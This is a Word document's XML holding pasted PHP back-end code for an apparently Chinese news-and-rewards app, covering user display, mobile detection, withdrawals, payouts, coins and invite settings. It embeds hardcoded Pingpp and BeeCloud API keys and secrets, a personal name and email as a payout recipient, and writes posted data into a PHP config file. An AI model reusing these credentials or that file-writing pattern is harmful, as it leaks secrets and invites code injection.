    <w:p w14:paraId="40619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co']=_userGroups($data['jingyan'],'img');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE9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roups']=_userGroups($data['jingyan']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1416D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data['nickname']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCD2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username']=$data['nickname'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DEAC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elseif($data['user']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549E6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username']=$data['user'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2F2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elseif($data['mobile']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0DF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username']=$data['mobile'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FD9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username']=substr($data['username'],0,3).'****'.substr($data['username'],7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C527A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elseif($data['email']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3341E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email = explode('@',$data['email']);                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D0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username'] = substr($data['email'],0,2).'*'.$email[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2EB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else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB733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ata='';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68434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789D3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img']){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43396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_imgurl().$data['img'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC36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D2F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public/style/index/img/userimg.gif';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C716A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02C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409D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name];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D48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29FEB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B86BB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D15E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D2051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ueditor($name=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF361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name='content';}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDE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ink href="/public/style/admin/plugins/ueditor/themes/default/_css/umeditor.css" type="text/css" rel="stylesheet"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADE8D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script type="text/javascript" charset="utf-8" src="/public/style/admin/plugins/ueditor/umeditor.config.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D8FE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script type="text/javascript" charset="utf-8" src="/public/style/admin/plugins/ueditor/editor_api.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAF5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script type="text/javascript" src="/public/style/admin/plugins/ueditor/lang/zh-cn/zh-cn.js"&gt;&lt;/script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A67F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script type="text/javascript"&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A4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var ue=UM.getEditor('".$name."');";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6D8F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script&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F27A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106F3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5359B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session(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C1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ssion::has('user','ffxiangUser')){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA81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66A8F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67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1BF8C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1B2E7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token(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376C25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ession::has('user','ffxiangUser') ? Session::get('user','ffxiangUser') : '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEAC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B732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sMobileApp()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADD9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377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 ($_SERVER['HTTP_X_WAP_PROFILE']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227726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00E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4CF25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89CC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 ($_SERVER['HTTP_VIA']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EF3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1955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tristr($_SERVER['HTTP_VIA'], "wap") ? true : false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A805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8FA5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 ($_SERVER['HTTP_USER_AGENT']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174AC3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362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ientkeywords = array ('nokia',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7987C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ny',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2373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icsson',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D24D8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t',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399AE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msung',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077771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c',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4C4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gh',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668BC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g',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE0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arp',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA3D4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ie-',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2563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hilips',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146DB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nasonic',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032A4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catel',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E808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enovo',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D996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hone',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0188AC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od',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A4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lackberry',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69330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izu',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6554F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ndroid',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08608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etfront',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E66E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ian',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181F9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cweb',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8C6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indowsce',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19922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lm',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16951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ramini',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CFE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ramobi',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF89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wave',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAE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exusone',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F4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dc',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C20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idp',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BFB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ap',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E58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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35028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E27BD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reg_match("/(" . implode('|', $clientkeywords) . ")/i", strtolower($_SERVER['HTTP_USER_AGENT'])))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15997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7FDF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56AE7B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ED63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B2B6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 ($_SERVER['HTTP_ACCEPT']))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F4D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3AC05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pos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') !== false) &amp;&amp; (strpos($_SERVER['HTTP_ACCEPT'], 'text/html') === false || (strpos($_SERVER['HTTP_ACCEPT'], 'vnd.wap.wml') &lt; strpos($_SERVER['HTTP_ACCEPT'], 'text/html'))))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49580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566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7A8B8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55A4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4AE4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2D00B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F70BE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734C9F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replace_str'  =&gt;  [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0A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__PUBLIC__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77697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__STYLE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public/style/index/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253E5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__CSS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public/style/index/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63163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JS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xml:space="preserve">'/public/style/index/js/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6692D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G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xml:space="preserve">'/public/style/index/img/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50E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P__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">'/public/style/index/plugins/', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59753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AGES__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/uploads/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0148A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GERROE__'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'/public/style/index/img/images.jpg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AED2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T_C__'       =&gt;  '/public/style/toutiao/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56076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T_I__'       =&gt;  '/public/style/toutiao/image/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B46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__T_J__'       =&gt;  '/public/style/toutiao/js/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2559A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P_J__'      =&gt;  '/public/style/mp/js/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07A0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P_I__'      =&gt;  '/public/style/mp/image/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9CB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P_C__'      =&gt;  '/public/style/mp/css/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA510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10691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trace'              =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA49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controller'     =&gt; 'Article',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065E6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late'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4F4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hink',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4E5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path'    =&gt; 'www_suxiangw_com/toutiao/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7192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suffix'  =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130F5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depr'    =&gt; DS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8F2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pl_begin'    =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422A1A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pl_end'      =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64469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begin' =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021C2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end'   =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C310D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pre_load'     =&gt;    'app\common\taglib\Fx', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E52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4F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B720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FEAA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0793D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4E73C8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AD06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Tixian extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3833E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AEDA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4B166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input();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EF6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3CC1CC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get['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D4EF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get['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1104E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34B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tixian')-&gt;where($where)-&gt;order('time desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2D7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450E4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4ED1E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5F6FC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F4A8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E0F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dit(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68862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7DC7E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tixian')-&gt;where(['id'=&gt;$id])-&gt;setField('data',0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79922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7845E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Db::name('member_tixian')-&gt;find($id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E3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 $user['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692FF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提现失败，退回</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$user['money'].'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D3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7391A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ser['uid'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B4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2245F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710FA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0017A4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1A5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C5DB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成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13793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6C7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失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580825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A6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k(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181A53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pp\Pingpp::setApiKey('sk_test_zz94WHfTufHKi9ejb1azj140');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F09F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pp\Pingpp::setPrivateKeyPath('./public/pingxx/your_rsa_private_key.pem');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1AD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 = \Pingpp\Transfer::create(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D5C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E0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_no'    =&gt; '123456789',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437A5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         =&gt; array('id' =&gt; 'app_f1aHePKCu9mTafT4'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C72B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     =&gt; 'alipay',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E523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ount'      =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358A6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cy'    =&gt; 'cny',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C6A1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b2c',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17372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ipient'   =&gt; 'mohuanshji85@163.com',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF01A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gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>测试打款</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2828E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378D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2E97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tr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27756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EFA5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44F61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2EE5F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de11b391-f625-4dba-b4ce-db31e8414168';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465795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secret = 'e595cedd-b31b-4057-bb9a-4c587fbedcec';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2902A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stersecret = 'b6441d1a-ec0b-4d56-84fa-6b27b03dfbc7';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6708E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stsecret = '69dfb715-e7d6-49df-a8de-3ed78230f7e6';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BEB60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eecloud\rest\api::registerApp($appid, $appsecret, $mastersecret, $testsecret);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD2A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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007FE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stamp' =&gt; time() * 1000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465FE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 =&gt; 'ALI',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BC0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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>支付宝企业打款</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B73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ansfer_no' =&gt; "a_" . time(),    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BEC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tch_no'  =&gt;  'w_'.time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9CFD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fee' =&gt; 1, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C506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_user_id' =&gt; 'mohuanshji85@163.com',   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598DF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_user_name' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>许飞翔</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D0B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ount_name' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定州得宝网络科技有限公司</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C7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ansfer_data'=&gt;[],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C317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0E5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beecloud\rest\api::transfers($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E961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result);exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443B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sult-&gt;result_code != 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34598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A0A17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2185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result-&gt;url)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F8A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Location:$result-&gt;url");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA15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477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Exception $e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5720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e-&gt;getMessage();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7569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26E0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1FC9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成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6389E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E28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C228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3EA5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0720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12BF4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EF588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in extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C831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BFB8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dateBasicDataLocally()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C563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7C5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A0C7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r = dirname(dirname(dirname(dirname(__FILE__))));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8CBF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ath = $dir . '/' . 'config/coin_basicdata/currency_list_merge.json';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319446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son_string = file_get_contents($file_path); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F6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cies = json_decode($json_string, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE41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currencies as $currency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63460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B51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Db::name('coin')-&gt;where('currency', $currency['currency'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3B4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in){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A7A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_ret=Db::name('coin')-&gt;where('currency',$currency['currency'])-&gt;update($currency);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B6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4D53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_ret=Db::name('coin')-&gt;insert($currency);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC3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553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FDC7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gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>更新完成</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DD2A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0A29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5BA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FEEE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04D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23D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D5E05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7B15A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0875EC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF728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currency']  = ['like','%'.$search_name.'%'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACE31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3576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3BAE7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403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coin')-&gt;order('id desc')-&gt;where($map)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9E6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data-&gt;render();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF23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05E2A0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244A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00C3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50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54C24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C36D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request()-&gt;isAjax()){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E799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9702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validate('Coin');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F726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post))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A7C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validate-&gt;getError()]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79471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382FEF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2207C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coin')-&gt;where('title',$post['title'])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9E2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358346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分组标题已存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082FC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63A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in')-&gt;insert($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06862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49E2D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234D1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0D06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350F6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A905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7E00DB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in')-&gt;where('id',$id)-&gt;update($post);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E66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F880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1F8939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81E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091AE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B7AE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B63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574B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ABFBD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coin')-&gt;where('id',$id)-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E72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7EDF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F6E9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9A7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4E36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48B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DFD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C600F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3B0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09F6D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49A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6A202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0361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563AD9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2AB12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8C08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Yaoqing extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC98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9C1C9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3A48D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yaoqing'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1785B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money_news_time']=$config['money_news_time']/1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00918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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A487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989F9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D411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post){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A238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3B661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57AF7D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oney_news_time']=$data['money_news_time']*1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028025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09323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66D42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74493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38537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t;?php\r\n".$data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7476E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yaoqing.php', print_r($data, true));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB82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26737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6217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3D08F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20B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AF50F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765DA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108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907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3C88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09F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BC30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A1C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600F9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input();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50704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7E739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get['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CB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get['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B033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23C0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_records')-&gt;order('time desc')-&gt;where($where)-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A27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2800F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473B5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49E7E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FEFC5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6F8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o(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB28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input();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575B7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6A9DA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get['uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDC90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1']=$get['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74944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68AB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udi_num']=['&lt;&gt;',0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DB0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FEF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gt;where($where)-&gt;order('tudi_num desc')-&gt;paginate('',false,['query'=&gt;request()-&gt;param()]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F3F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3741A4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C626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16A90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E254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5551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nwu(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F190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Db::name('renwu')-&gt;order('desc desc,id,asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F348B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DD20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D256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224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3EB1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DA08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530EA0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733555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02753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ategory extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC04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D6BA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7482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category')-&gt;order('des desc,id asc')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06049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get_tree_option($category,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F5C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category);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A69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A001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D9D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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="70611B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8785E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1CD72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put('post.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05469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7F5ED8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Db::name('category')-&gt;where('id',input('id'))-&gt;update($data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7497A7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fo){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC68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ret"=&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
